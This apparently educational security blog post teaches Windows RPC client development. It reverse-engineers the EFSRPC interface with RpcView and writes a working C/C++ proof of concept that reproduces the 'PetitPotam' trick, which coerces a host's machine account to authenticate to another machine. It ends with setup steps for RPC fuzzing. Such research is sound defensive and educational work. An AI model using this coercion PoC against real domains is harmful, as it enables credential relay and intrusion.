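In practice, a protocol sequence is usually combined with a network address and an endpoint into a "string binding" of the form `ProtSeq:NetworkAddr[Endpoint]`. On Windows, the RPC runtime function RpcStringBindingCompose builds this string for you. The sketch below only mimics the basic layout in portable C to show how the pieces fit together. `compose_string_binding` is a made-up helper, the address and endpoints are placeholder values, and the object UUID, options and escaping rules (which matter for named pipe paths) are deliberately left out.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Writes "protseq:network_addr[endpoint]" into out.
   network_addr and endpoint may be NULL (treated as empty strings).
   Returns 0 on success, -1 if the output buffer is too small. */
int compose_string_binding(char *out, size_t out_len, const char *protseq,
                           const char *network_addr, const char *endpoint)
{
    assert(out != NULL && protseq != NULL);

    int n = snprintf(out, out_len, "%s:%s[%s]", protseq,
                     network_addr != NULL ? network_addr : "",
                     endpoint != NULL ? endpoint : "");

    return (n >= 0 && (size_t)n < out_len) ? 0 : -1;
}
```

For example, `compose_string_binding(buf, sizeof(buf), "ncacn_ip_tcp", "10.0.0.5", "49664")` produces `ncacn_ip_tcp:10.0.0.5[49664]`, while a local endpoint with no network address gives something like `ncalrpc:[demo_endpoint]`.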

Binding Handles

Once you know the definition of the interface and which protocol to use, you have (almost) all the information you need to connect or bind to the remote or local RPC server.

This concept is quite similar to how kernel object handles work. For example, when you want to write some data to a file, you first call CreateFile to open it. In return, the kernel gives you a handle that you can then use to write your data by passing the handle to WriteFile. Similarly, with RPC, you connect to an RPC server by creating a binding handle, that you can then use to invoke procedures or functions on the interface you requested access to. It’s as simple as that.

Note: this analogy is limited though as the RPC client initiates its own binding handle. The RPC server is then responsible for ensuring that the client has the appropriate privileges to invoke a given procedure.



Unlike with kernel object handles though, there are multiple types of binding handles: automatic, implicit and explicit. This type determines how much work a client has to do in order to initialize and/or manage the binding handle. In this post, I will cover only one example, but I made another diagram to illustrate these different cases.

For instance, if an RPC server requires the use of explicit binding handles, as a client, you have to write some code to create it first and then you have to explicitly pass it as an argument for each procedure call. On the other hand, if the server requires the use of automatic binding handles, you can just call a remote procedure, and the RPC runtime will take care of everything else, such as connecting to the server, passing the binding handle and closing it when it’s done.

The “PetitPotam” case

The EFSRPC protocol is widely documented here but, for the sake of this blog post, we will just pretend that this documentation does not exist. So, we will first see how we can collect all the information we need with RpcView. Then, we will see how we can use this information to write a simple RPC client application. Finally, we will use this RPC client application to experiment a bit and see what we can do with the exposed RPC procedures.





Exploring the EFSRPC Interface with RpcView



Let’s imagine we are randomly browsing the output of RpcView, searching for interesting procedure names. Since we downloaded the PDB files for all the DLLs that are in C:\Windows\System32 and we configured the appropriate path in the options (see part 1), this should feel pretty much like playing a video game. :nerd_face:











When clicking on the LSASS process (1), we can see that it contains many RPC interfaces. So we go through them one by one and we stop on the one with the GUID c681d488-d850-11d0-8c52-00c04fd90f7e (2) because it exposes several procedures that seem to perform file operations (according to their name) (3).

File operations initiated by low-privileged users and performed by privileged processes (such as services running as SYSTEM) are always interesting to investigate because they might lead to local privilege escalation (or even remote code execution in some cases). On top of that, they are relatively easy to find and visualize, using Process Monitor for instance.

In this example, RpcView provides other very useful information. It shows that the interface we selected is exposed through a named pipe: \pipe\lsass (4). It also shows us the name of the process, the path of the executable on disk and the user it runs as (5). Finally, we know that this interface is part of the “LSA extension for EFS”, which is implemented in C:\Windows\System32\efslsaext.dll (6).

Collecting all the Required Information

As I explained at the beginning of this post, in order to interact with an RPC server, a client needs some information: the ID of the interface, the protocol sequence to use and, last but not least, the definition of the interface itself. As we have seen in the previous part, RpcView already gives us the ID of the interface and the protocol sequence, but what about the interface’s definition?

- ID of the interface: c681d488-d850-11d0-8c52-00c04fd90f7e

- Protocol sequence: ncacn_np

- Name of the endpoint: \pipe\lsass

And here comes what probably is the most powerful feature of RpcView. If you select the interface you are interested in, and right-click on it, you will see an option that allows you to “decompile” it. The “decompiled” IDL code will then appear in the “Decompilation” window right above it.

Although this feature is very powerful, it is not 100% reliable. So, don’t expect it to always produce a usable file, straight out of the box. Besides, some information such as the name of the structures is inevitably lost in the process. In the next parts, I will cover some common errors you may encounter when using the generated IDL file.

Creating an RPC Client for the EFSRPC Interface in C/C++

Now that we have all the information we need, we can create an RPC client in C/C++ and start playing around with the interface.

As I already explained how to install and set up Visual Studio, I won’t go through this step again in this post. Please note that I’m using Visual Studio Community 2019 and the latest version of the Windows 10 SDK is also installed. The versions should not be that important though as we are not doing anything fancy.





Let’s fire up Visual Studio and create a new C++ Console App project.

I will simply name this new project EfsrClient and save it in C:\Workspace.

Visual Studio will automatically create the file EfsrClient.cpp, which contains the main function along with some comments explaining how to compile and build the project. Usually, I get rid of these comments, and I rewrite the main function as follows, just to start with a clean file.

int wmain(int argc, wchar_t* argv[])

{

}







The next thing you want to do is go back to RpcView, select the “decompiled” interface definition, copy its content, and save it as a new file in your project. To do so, you can simply right-click on the “Source Files” folder, and then Add > New Item....

In the dialog box, we can select the C++ File (.cpp) template, and enter something like efsr.idl in the Name field. Although the template is not important, the extension of the file must be .idl because it determines which compiler Visual Studio will use for this file. In this case, it will use the MIDL compiler.



Once this is done, you should have a new file called efsr.idl in the “Source Files” folder. Next, we can right-click on our IDL file and compile it. But before doing so, make sure to select the appropriate target architecture: x86 or x64 here. Indeed, the MIDL compiler produces architecture-dependent code so, if you compile the IDL file for the x86 architecture and later decide to compile your application for the x64 architecture, you will most likely get into trouble.



If all goes well, you should see something like this in the Build Output window.



At this point, the MIDL compiler has created 3 files:

| File | Type | Intended for | Description |
|---|---|---|---|
| efsr_h.h | Header file | Client and Server | Essentially function and structure definitions, well that’s a header file… |
| efsr_c.c | Source file | Client | Code for the RPC runtime on client side |
| efsr_s.c | Source file | Server | Code for the RPC runtime on server side, we don’t need this file |

Although these files were created in the solution’s folder, they are not automatically added to the solution itself, so we need to do this manually.

- Right-click on the “Header Files” folder, Add > Existing Item... > efsr_h.h > Add.

- Right-click on the “Source Files” folder, Add > Existing Item... > efsr_c.c > Add.

Before going any further, we should make sure that both the header and the source files are well formed.



Here we can see that there is a problem with the file efsr_h.h. Some structure definitions were inserted in the middle of two function prototypes.

long Proc1_EfsRpcReadFileRaw_Downlevel(

[in][context_handle] void* arg_0,

[out]pipe char* arg_1);

long Proc2_EfsRpcWriteFileRaw_Downlevel(

[in][context_handle] void* arg_0,

[in]pipe char* arg_1);



If we check the definition of these two functions in the IDL file, we can see that the keyword pipe was inserted, but the MIDL compiler didn’t handle it properly. For now, we can simply remove this keyword and compile again.

Note: the type identified by RpcView was actually correct but, because of the syntax, the compiler failed to produce the correct output code. In the original IDL file, the type of arg_1 is EFS_EXIM_PIPE*, where EFS_EXIM_PIPE is indeed defined as a pipe unsigned char.

When dealing with IDL files generated by RpcView, this kind of error should be expected as the “decompilation” process is not supposed to produce a 100% usable result, straight out of the box. With time and practice though, you can quickly spot these issues and fix them.

After doing that, the header file looks much better. We no longer have syntax errors in this file.

The thing I usually do next is simply include the header file in the main source code, and compile as is to check if we have any errors.

#include "efsr_h.h"

int wmain(int argc, wchar_t* argv[])

{

}



Here we have 3 errors. The files were successfully compiled but the linker was not able to resolve some symbols: NdrClientCall3, MIDL_user_free, and MIDL_user_allocate.

First things first, the functions MIDL_user_allocate and MIDL_user_free are used to allocate and free memory for the RPC stubs. They are documented here and here. When implementing an RPC application, they must be defined somewhere in the application. It sounds more complicated than it really is though. In practice, we just have to add the following code to our main file.

void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes)

{

return((void __RPC_FAR *) malloc(cBytes));

}

void __RPC_USER midl_user_free(void __RPC_FAR * p)

{

free(p);

}



If we try to build the project again, we should see that two of the three errors are now gone, and were replaced by two warnings that we can ignore.

One error remains though: the linker can’t find the NdrClientCall3 function. The NdrClientCall* functions are the cornerstone of the communication between the client and the server as they basically do all the heavy lifting on your behalf. Whenever you call a remote procedure, they serialize your parameters, send your request as a packet to the server, receive the response, deserialize it, and finally return the result.



As an example, here is what the definition of the EfsRpcOpenFileRaw procedure looks like in efsr_c.c. You can see that, on client side, EfsRpcOpenFileRaw basically consists of a “simple” call to NdrClientCall3.

long Proc0_EfsRpcOpenFileRaw_Downlevel(

/* [context_handle][out] */ void **arg_1,

/* [string][in] */ wchar_t *arg_2,

/* [in] */ long arg_3)

{

CLIENT_CALL_RETURN _RetVal;

_RetVal = NdrClientCall3(

( PMIDL_STUBLESS_PROXY_INFO )&DefaultIfName_ProxyInfo,

0,

0,

arg_1,

arg_2,

arg_3);

return ( long )_RetVal.Simple;

}

Note: I intentionally did not modify the function names generated by RpcView to highlight the fact that they do not matter. In the end, the server just receives an Opnum value, which is a numeric value that identifies the procedure to call internally. In the case of EfsRpcOpenFileRaw, this value would be 0 (second argument of NdrClientCall3).

CLIENT_CALL_RETURN RPC_VAR_ENTRY NdrClientCall3(

MIDL_STUBLESS_PROXY_INFO *pProxyInfo,

unsigned long nProcNum,

void *pReturnValue,

...

);
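To illustrate why the generated procedure names are irrelevant, here is a toy sketch of Opnum-based dispatch. This is not how rpcrt4.dll is implemented: the handler functions, the string-based argument and the Dispatch helper are all hypothetical, and a real server stub receives marshalled NDR data rather than a plain string. The only point is that the procedure is selected by its index.

```cpp
#include <array>
#include <cstddef>
#include <stdexcept>
#include <string>

// Hypothetical handler type (assumption): real stubs work on marshalled NDR buffers.
using Handler = std::string (*)(const std::string&);

// Hypothetical handlers, named freely: the names never travel over the wire.
static std::string OpenFileRaw(const std::string& arg)  { return "open:" + arg; }
static std::string ReadFileRaw(const std::string& arg)  { return "read:" + arg; }
static std::string WriteFileRaw(const std::string& arg) { return "write:" + arg; }

// The position of a handler in this table plays the role of the Opnum.
static const std::array<Handler, 3> kDispatchTable = { OpenFileRaw, ReadFileRaw, WriteFileRaw };

// Selects the handler from the numeric Opnum only, and rejects unknown values.
std::string Dispatch(std::size_t opnum, const std::string& arg)
{
    if (opnum >= kDispatchTable.size())
        throw std::out_of_range("unknown opnum");
    return kDispatchTable[opnum](arg);
}
```

With this table, Dispatch(0, ...) always reaches the first procedure, whatever name the client gave to its own stub function.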



Let’s return to our error message. When the linker is not able to resolve a function symbol, it usually means that we have to explicitly specify where it can find it. And by “where”, I mean “in which DLL”. This kind of information can usually be found in the documentation, so let’s check what we can find about the NdrClientCall3 function here.

The documentation tells us that the NdrClientCall3 function is exported by the RpcRT4.dll DLL. Nothing surprising as it’s the DLL that implements the RPC runtime (remember my previous post?). This means that we have to reference the RpcRT4.lib file in our application. To do so, I personally use the following directive rather than modifying the configuration of the project.

#pragma comment(lib, "RpcRT4.lib")



If you followed along, your code should look like this, and you should also be able to build the project.

Writing a PoC

We already went through a lot of steps at this point, and our application still does nothing. So it’s time to see how to invoke a remote procedure. This process usually goes like this.

- Call RpcStringBindingCompose to create the string representation of the binding, you can think of it as a URL.

- Call RpcBindingFromStringBinding to create the binding handle based on the previous binding string.

- Call RpcStringFree to free the binding string as we don’t need it anymore.

- Optionally call RpcBindingSetAuthInfo or RpcBindingSetAuthInfoEx to set explicit authentication information on our binding handle.

- Use the binding handle to invoke remote procedures.

- Call RpcBindingFree to free the binding handle.

In my case, this yields the following stub code:

#include "efsr_h.h"

#include <iostream>

#pragma comment(lib, "RpcRT4.lib")

int wmain(int argc, wchar_t* argv[])

{

RPC_STATUS status;

RPC_WSTR StringBinding;

RPC_BINDING_HANDLE Binding;

status = RpcStringBindingCompose(

NULL, // Interface's GUID, will be handled by NdrClientCall

(RPC_WSTR)L"ncacn_np", // Protocol sequence

(RPC_WSTR)L"\\\\127.0.0.1", // Network address

(RPC_WSTR)L"\\pipe\\lsass", // Endpoint

NULL, // No options here

&StringBinding // Output string binding

);

wprintf(L"[*] RpcStringBindingCompose status code: %d\r\n", status);

wprintf(L"[*] String binding: %ws\r\n", StringBinding);

status = RpcBindingFromStringBinding(

StringBinding, // Previously created string binding

&Binding // Output binding handle

);

wprintf(L"[*] RpcBindingFromStringBinding status code: %d\r\n", status);

status = RpcStringFree(

&StringBinding // Previously created string binding

);

wprintf(L"[*] RpcStringFree status code: %d\r\n", status);

RpcTryExcept

{

// Invoke remote procedure here

}

RpcExcept(EXCEPTION_EXECUTE_HANDLER);

{

wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());

}

RpcEndExcept

status = RpcBindingFree(

&Binding // Reference to the opened binding handle

);

wprintf(L"[*] RpcBindingFree status code: %d\r\n", status);

}

void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)

{

return((void __RPC_FAR*) malloc(cBytes));

}

void __RPC_USER midl_user_free(void __RPC_FAR* p)

{

free(p);

}

Note: I would recommend invoking remote procedures inside a try/catch block because exceptions are quite common in the context of the RPC runtime. Sometimes exceptions simply occur because the syntax of the request is incorrect but, in other cases, servers can also just throw exceptions rather than returning an error code.

We can already compile this code and make sure everything is OK. RPC functions return an RPC_STATUS code. If they execute successfully, they return the value 0, which means RPC_S_OK. If that’s not the case, you can check the documentation here to determine what’s wrong, or you can even write a function to print the corresponding Win32 error message.

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe

[*] RpcStringBindingCompose status code: 0

[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]

[*] RpcBindingFromStringBinding status code: 0

[*] RpcStringFree status code: 0

[*] RpcBindingFree status code: 0
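The doubled backslashes in the string binding printed above come from the fact that the backslash is an escape character in the string binding syntax. The following portable sketch mimics that output for the simple case used here (protocol sequence, network address and endpoint, with no object UUID or options). ComposeStringBinding and EscapeBinding are hypothetical helpers written for illustration, not the actual implementation of RpcStringBindingCompose, and the sketch only escapes backslashes.

```cpp
#include <string>

// Doubles every backslash, since it acts as the escape character in a string binding.
static std::wstring EscapeBinding(const std::wstring& s)
{
    std::wstring out;
    for (wchar_t c : s) {
        if (c == L'\\')
            out += L'\\';
        out += c;
    }
    return out;
}

// Builds "protseq:address[endpoint]" (assumption: no object UUID, no options).
std::wstring ComposeStringBinding(const std::wstring& protSeq,
                                  const std::wstring& networkAddr,
                                  const std::wstring& endpoint)
{
    std::wstring binding = protSeq + L":" + EscapeBinding(networkAddr);
    if (!endpoint.empty())
        binding += L"[" + EscapeBinding(endpoint) + L"]";
    return binding;
}
```

Called with ncacn_np, \\127.0.0.1 and \pipe\lsass, this helper produces the same text as the "String binding" line of the output above.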

Now that we have our binding handle, we can try and invoke the EfsRpcOpenFileRaw procedure. But wait… There is a problem with the function’s prototype. It doesn’t take a binding handle as an argument.

If we go back to the definition of the function in the IDL file, we can see that there is indeed an issue. The argument list should start with arg_0, as shown in the next procedure, EfsRpcReadFileRaw. Therefore, something is missing.

long Proc0_EfsRpcOpenFileRaw_Downlevel(

[out][context_handle] void** arg_1,

[in][string] wchar_t* arg_2,

[in]long arg_3);

long Proc1_EfsRpcReadFileRaw_Downlevel(

[in][context_handle] void* arg_0,

[out] char* arg_1);

The missing arg_0 argument is precisely the binding handle we need to pass to the RPC runtime. It’s a typical error I’ve encountered numerous times with RpcView. However, I don’t know if it’s a problem with the tool or a misunderstanding on my part.

Another thing that should tip you off is the fact that the EfsRpcOpenFileRaw procedure returns a context handle as an output value ([out][context_handle] void** arg_1). This is a very common thing for RPC servers. They often expose a procedure that takes a binding handle as an input value and yields a context handle that you must use in later RPC calls.

So, let’s fix this and compile the IDL file once again.

long Proc0_EfsRpcOpenFileRaw_Downlevel(

[in]handle_t arg_0,

[out][context_handle] void** arg_1,

[in][string] wchar_t* arg_2,

[in]long arg_3);

Now, we know that arg_0 is the binding handle. We also know that arg_1 is a reference to the output context handle. Here, we suppose we don’t know the details of the context structure, but that’s not an issue. We can just pass a reference to an arbitrary void* variable. Then, we don’t know what arg_2 and arg_3 are. Since arg_2 is a wchar_t* and the name of the procedure is EfsRpcOpenFileRaw, we can assume that arg_2 is supposed to be a file path. The value of arg_3 is yet to be determined. However, we know that it’s a long so we can arbitrarily set it to 0, and see what happens. Note that StringCchPrintf is declared in strsafe.h, so this header must be included as well.

RpcTryExcept

{

// Invoke remote procedure here

PVOID pContext;

LPWSTR pwszFilePath;

long result;

pwszFilePath = (LPWSTR)LocalAlloc(LPTR, MAX_PATH * sizeof(WCHAR));

StringCchPrintf(pwszFilePath, MAX_PATH, L"C:\\Workspace\\foo123.txt");

wprintf(L"[*] Invoking EfsRpcOpenFileRaw with target path: %ws\r\n", pwszFilePath);

result = Proc0_EfsRpcOpenFileRaw_Downlevel(Binding, &pContext, pwszFilePath, 0);

wprintf(L"[*] EfsRpcOpenFileRaw status code: %d\r\n", result);

LocalFree(pwszFilePath);

}

RpcExcept(EXCEPTION_EXECUTE_HANDLER);

{

wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());

}

RpcEndExcept

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe

[*] RpcStringBindingCompose status code: 0

[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]

[*] RpcBindingFromStringBinding status code: 0

[*] RpcStringFree status code: 0

[*] Invoking EfsRpcOpenFileRaw with target path: C:\Workspace\foo123.txt

[*] EfsRpcOpenFileRaw status code: 5

[*] RpcBindingFree status code: 0

Running this code, EfsRpcOpenFileRaw fails with the standard Win32 error code 5, which means “Access denied”. This kind of error can be very frustrating because you don’t really know what is going wrong. An “Access denied” error can be returned for a large number of reasons (e.g.: insufficient privileges, wrong combination of parameters, etc.).
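When reading this kind of output, it helps to translate the numeric codes into their symbolic names. On Windows, FormatMessage can return the system message for a code. The portable sketch below takes a simpler route and only knows a handful of well-known values; DescribeStatus is a hypothetical helper, and the selection of codes is mine.

```cpp
#include <string>

// Maps a few well-known Win32 / RPC status codes to their symbolic names.
// Assumption: this table is deliberately tiny; extend it as needed.
std::string DescribeStatus(long status)
{
    switch (status) {
    case 0:    return "RPC_S_OK";
    case 2:    return "ERROR_FILE_NOT_FOUND";
    case 5:    return "ERROR_ACCESS_DENIED";
    case 1722: return "RPC_S_SERVER_UNAVAILABLE";
    case 1753: return "EPT_S_NOT_REGISTERED";
    default:   return "unknown (" + std::to_string(status) + ")";
    }
}
```

For the call above, DescribeStatus(5) yields ERROR_ACCESS_DENIED, which is easier to spot in a log than a bare number.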

Normally, you would have to start reversing the target procedure in order to determine why the server returns this error. However, for the sake of conciseness, I will cheat a bit and just check the documentation. In the documentation of EfsRpcOpenFileRaw, you can read that the third parameter is indeed a “FileName”, but more precisely, it’s an “EFSRPC identifier”. And according to this documentation, “EFSRPC identifiers” are supposed to be UNC paths. So, we can change the following line of code and see if this solves the problem.

StringCchPrintf(pwszFilePath, MAX_PATH, L"\\\\127.0.0.1\\C$\\Workspace\\foo123.txt");

After modifying the code, the server now returns the error code 2, which means “File not found”. That’s a good sign.

C:\Workspace\EfsrClient\x64\Release>EfsrClient.exe

[*] RpcStringBindingCompose status code: 0

[*] String binding: ncacn_np:\\\\127.0.0.1[\\pipe\\lsass]

[*] RpcBindingFromStringBinding status code: 0

[*] RpcStringFree status code: 0

[*] Invoking EfsRpcOpenFileRaw with target path: \\127.0.0.1\C$\Workspace\foo123.txt

[*] EfsRpcOpenFileRaw status code: 2

[*] RpcBindingFree status code: 0
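The change from a local path to a UNC path can be generalized with a small helper. This is a minimal sketch, assuming the target drive is reachable through its administrative share (C$, D$, and so on), as in the example above. ToAdminShareUnc is a hypothetical name, and the function only accepts paths of the form X:\... and returns an empty string otherwise.

```cpp
#include <cwctype>
#include <string>

// Turns "C:\dir\file" into "\\host\C$\dir\file" (assumption: admin share is available).
// Returns an empty string when the input is not a drive-letter path.
std::wstring ToAdminShareUnc(const std::wstring& host, const std::wstring& localPath)
{
    if (localPath.size() < 3 || !std::iswalpha(localPath[0]) ||
        localPath[1] != L':' || localPath[2] != L'\\')
        return L"";

    // Keep the drive letter, replace ':' with '$', then append the rest of the path.
    return L"\\\\" + host + L"\\" + localPath[0] + L"$" + localPath.substr(2);
}
```

With the host 127.0.0.1 and the path C:\Workspace\foo123.txt, the result is the UNC path used in the second run.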

Identifying an Interesting Behavior















































With Process Monitor running in the background, we can see that lsass.exe indeed tried to access the file \\127.0.0.1\C$\Workspace\foo123.txt, which does not exist, hence the “File not found” error.





However, if we check the details of the CreateFile operation, we can see that the RPC server is actually impersonating the client. In other words, we could have simply called CreateFile ourselves and the result would have been the same.



What’s interesting though is what happens before lsass.exe tries to access the target file. Indeed, it opens the named pipe \pipe\srvsvc, this time without impersonating the client. If you saw my post about PrintSpoofer, you know that a similar behavior was observed with the Print Spooler server, which tried to open the named pipe \pipe\spoolss.

Of course, the NT AUTHORITY\SYSTEM account cannot be used for network authentication. So, when invoking this procedure with a remote path on a domain-joined machine, Windows will actually use the machine account to authenticate on the remote server. This explains why “PetitPotam” is able to coerce an arbitrary Windows host to authenticate to another machine.

And here is the final code.

#include "efsr_h.h"

#include <iostream>

#include <strsafe.h>

#pragma comment(lib, "RpcRT4.lib")

int wmain(int argc, wchar_t* argv[])

{

RPC_STATUS status;

RPC_WSTR StringBinding;

RPC_BINDING_HANDLE Binding;

status = RpcStringBindingCompose(

NULL, // Interface's GUID, will be handled by NdrClientCall

(RPC_WSTR)L"ncacn_np", // Protocol sequence

(RPC_WSTR)L"\\\\127.0.0.1", // Network address

(RPC_WSTR)L"\\pipe\\lsass", // Endpoint

NULL, // No options here

&StringBinding // Output string binding

);

wprintf(L"[*] RpcStringBindingCompose status code: %d\r\n", status);

wprintf(L"[*] String binding: %ws\r\n", StringBinding);

status = RpcBindingFromStringBinding(

StringBinding, // Previously created string binding

&Binding // Output binding handle

);

wprintf(L"[*] RpcBindingFromStringBinding status code: %d\r\n", status);

status = RpcStringFree(

&StringBinding // Previously created string binding

);

wprintf(L"[*] RpcStringFree status code: %d\r\n", status);

RpcTryExcept

{

// Invoke remote procedure here

PVOID pContext;

LPWSTR pwszFilePath;

long result;

pwszFilePath = (LPWSTR)LocalAlloc(LPTR, MAX_PATH * sizeof(WCHAR));

//StringCchPrintf(pwszFilePath, MAX_PATH, L"C:\\Workspace\\foo123.txt");

StringCchPrintf(pwszFilePath, MAX_PATH, L"\\\\127.0.0.1\\C$\\Workspace\\foo123.txt");

wprintf(L"[*] Invoking EfsRpcOpenFileRaw with target path: %ws\r\n", pwszFilePath);

result = Proc0_EfsRpcOpenFileRaw_Downlevel(Binding, &pContext, pwszFilePath, 0);

wprintf(L"[*] EfsRpcOpenFileRaw status code: %d\r\n", result);

LocalFree(pwszFilePath);

}

RpcExcept(EXCEPTION_EXECUTE_HANDLER);

{

wprintf(L"Exception: %d - 0x%08x\r\n", RpcExceptionCode(), RpcExceptionCode());

}

RpcEndExcept

status = RpcBindingFree(

&Binding // Reference to the opened binding handle

);

wprintf(L"[*] RpcBindingFree status code: %d\r\n", status);

}

void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)

{

return((void __RPC_FAR*) malloc(cBytes));

}

void __RPC_USER midl_user_free(void __RPC_FAR* p)

{

free(p);

}

Conclusion

In this blog post, we saw how it was possible to get all the information we need from RpcView to build a lightweight client application in C/C++. In particular, we saw how we could reproduce the “PetitPotam” trick by invoking the EfsRpcOpenFileRaw procedure of the EFSR interface. I tried to include as many details as I could, but of course, I cannot cover every aspect of Windows RPC in a single post. If you are interested in Windows RPC, @0xcsandker also wrote an excellent blog post about this subject here: Offensive Windows IPC Internals 2: RPC. His posts are always worth a read as they are thorough and aggregate a lot of information.

I also tried to cover some practical issues and errors you often encounter when implementing an RPC client in C/C++. But again, you will have to deal with a lot of other errors when compiling or invoking remote procedures, if you decide to go this route. Thankfully, a lot of Windows RPC interfaces are documented, such as EFSRPC, so that’s a good starting point.

Finally, implementing an RPC client in C/C++ isn’t necessarily the best approach if you are doing some security oriented research as this process is rather time-consuming. However, I would still recommend it because it is a good way to learn and have a better understanding of some Windows internals. As an alternative, a more research oriented approach would consist in using the NtObjectManager module developed by James Forshaw. This module is quite powerful as it allows you to interact with an RPC server in a few lines of PowerShell. As usual, James wrote an excellent article about it here: Calling Local Windows RPC Servers from .NET.

Links & Resources

- GitHub - PetitPotam by @topotam77: https://github.com/topotam/PetitPotam

- Offensive Windows IPC Internals 2: RPC by @0xcsandker: https://csandker.io/2021/02/21/Offensive-Windows-IPC-2-RPC.html

- Calling Local Windows RPC Servers from .NET by @tiraniddo: https://googleprojectzero.blogspot.com/2019/12/calling-local-windows-rpc-servers-from.html

Fuzzing Windows RPC with RpcView

The recent release of PetitPotam by @topotam77 motivated me to get back to Windows RPC fuzzing. On this occasion, I thought it would be cool to write a blog post explaining how one can get into this security research area.

RPC as a Fuzzing Target?

As you know, RPC stands for “Remote Procedure Call”, and it isn’t a Windows specific concept. The first implementations of RPC were made on UNIX systems in the eighties. This allowed machines to communicate with each other on a network, and it was even “used as the basis for Network File System (NFS)” (source: Wikipedia).

The RPC implementation developed by Microsoft and used on Windows is DCE/RPC, which is short for “Distributed Computing Environment / Remote Procedure Calls” (source: Wikipedia). DCE/RPC is only one of the many IPC (Interprocess Communications) mechanisms used in Windows. For example, it’s used to allow a local process or even a remote client on the network to interact with another process or a service on a local or remote machine.

As you will have understood, the security implications of such a protocol are particularly interesting. Vulnerabilities in an RPC server may have various consequences, ranging from Denial of Service (DoS) to Remote Code Execution (RCE) and including Local Privilege Escalation (LPE). Coupled with the fact that the code of the legacy RPC servers on Windows is often quite old (if we exclude the more recent (D)COM model), this makes it a very interesting target for fuzzing.

How to Fuzz Windows RPC?

To be clear, this post is not about advanced and automated fuzzing. Others, far more talented than me, already discussed this topic. Rather, I want to show how a beginner can get into this kind of research without any knowledge in this field.

Pentesters use Windows RPC every time they work in Windows / Active Directory environments with impacket-based tools, perhaps without always being fully aware of it. The use of Windows RPC was probably made a bit more obvious with tools such as SpoolSample (a.k.a the “Printer Bug”) by @tifkin_ or, more recently, PetitPotam by @topotam77.

If you want to know how these tools work, or if you want to find bugs in Windows RPC by yourself, I think there are two main approaches. The first approach consists in looking for interesting keywords in the documentation and then experimenting by modifying the impacket library or by writing an RPC client in C. As explained by @topotam77 in the episode 0x09 of the French Hack’n Speak podcast, this approach was particularly efficient in the conception of PetitPotam. However, it has some limitations. The main one is that not all RPC interfaces are documented, and even the existing documentation isn’t always complete. Therefore, the second approach consists in enumerating the RPC servers directly on a Windows machine, with a tool such as RpcView.

RpcView

If you are new to Windows RPC analysis, RpcView is probably the best tool to get started. It is able to enumerate all the RPC servers that are running on a machine and it provides all the collected information in a very neat GUI (Graphical User Interface). When you are not yet familiar with a technical and/or abstract concept, being able to visualize things this way is an undeniable benefit.

Note: this screenshot was taken from https://rpcview.org/.

This tool was originally developed by 4 French researchers - Jean-Marie Borello, Julien Boutet, Jeremy Bouetard and Yoanne Girardin (see authors) - in 2017 and is still actively maintained. Its use was highlighted at PacSec 2017 in the presentation A view into ALPC-RPC by Clément Rouault and Thomas Imbert. This presentation also came along with the tool RPCForge.

Downloading and Running RpcView for the First Time



RpcView’s official repository is located here: https://github.com/silverf0x/RpcView. For each commit, a new release is automatically built through AppVeyor. So, you can always download the latest version of RpcView here.





After extracting the 7z archive, you just have to execute RpcView.exe (ideally as an administrator), and you should be ready to go. However, if the version of Windows you are using is too recent, you will probably get an error similar to the one below.

According to the error message, our “runtime version” is not supported, and we are supposed to send our rpcrt4.dll file to the dev team. This message may sound a bit cryptic for a neophyte but there is nothing to worry about, that’s completely fine.

The library rpcrt4.dll, as its name suggests, literally contains the “RPC runtime”. In other words, it contains all the necessary base code that allows an RPC client and an RPC server to communicate with each other.

Now, if we take a look at the README on GitHub, we can see that there is a section entitled How to add a new RPC runtime. It tells us that there are two ways to solve this problem. The first way is to just edit the file RpcInternals.h and add our runtime version. The second way is to reverse rpcrt4.dll in order to define the required structures such as RPC_SERVER. Honestly, the implementation of the RPC runtime doesn’t change that often, so the first option is perfectly fine in our case.
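As a side note on what a “runtime version” looks like in practice, here is a minimal sketch of how a four-part file version such as 10.0.19041.1081 can be packed into a single 64-bit value. This assumes the same layout as the Windows file version resource (four 16-bit fields: major, minor, build, revision). I believe this is the representation expected in RpcInternals.h, but treat it as an assumption and compare the result with the entries already present in that file. PackRuntimeVersion is a hypothetical helper.

```cpp
#include <cstdint>

// Packs major.minor.build.revision into one 64-bit value, 16 bits per field.
// Assumption: same layout as the Windows file version resource (MS/LS dwords).
constexpr std::uint64_t PackRuntimeVersion(std::uint16_t major,
                                           std::uint16_t minor,
                                           std::uint16_t build,
                                           std::uint16_t revision)
{
    return (static_cast<std::uint64_t>(major) << 48) |
           (static_cast<std::uint64_t>(minor) << 32) |
           (static_cast<std::uint64_t>(build) << 16) |
            static_cast<std::uint64_t>(revision);
}
```

Under this assumption, version 10.0.19041.1081 of rpcrt4.dll would be written 0xA00004A610439.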



Compiling RpcView

We saw that our RPC runtime is not currently supported, so we will have to update RpcInternals.h with our runtime version and build RpcView from the source. To do so, we will need the following:











- Visual Studio 2019 (Community)

- CMake >= 3.13.2

- Qt5 == 5.15.2

Note: I strongly recommend using a Virtual Machine for this kind of setup. For your information, I also use Chocolatey - the package manager for Windows - to automate the installation of some of the tools (e.g.: Visual Studio, GIT tools).

Installing Visual Studio 2019

You can download Visual Studio 2019 here or install it with Chocolatey.

choco install visualstudio2019community

While you’re at it, you should also install the Windows SDK as you will need it later on. I use the following code in PowerShell to find the latest available version of the SDK.

[string[]]$sdks = (choco search windbg | findstr "windows-sdk")

$sdk_latest = ($sdks | Sort-Object -Descending | Select -First 1).split(" ")[0]

And I install it with Chocolatey. If you want to install it manually, you can also download the web installer here.

choco install $sdk_latest

Once Visual Studio is installed, you have to open the “Visual Studio Installer”.



And install the “Desktop development with C++” toolkit. I hope you have a solid Internet connection and enough disk space… :grimacing:

Installing CMake

Installing CMake is as simple as running the following command with Chocolatey. But, again, you can also download it from the official website and install it manually.

choco install cmake

Note: CMake is also part of Visual Studio “Desktop development with C++”, but I never tried to compile RpcView with this version.

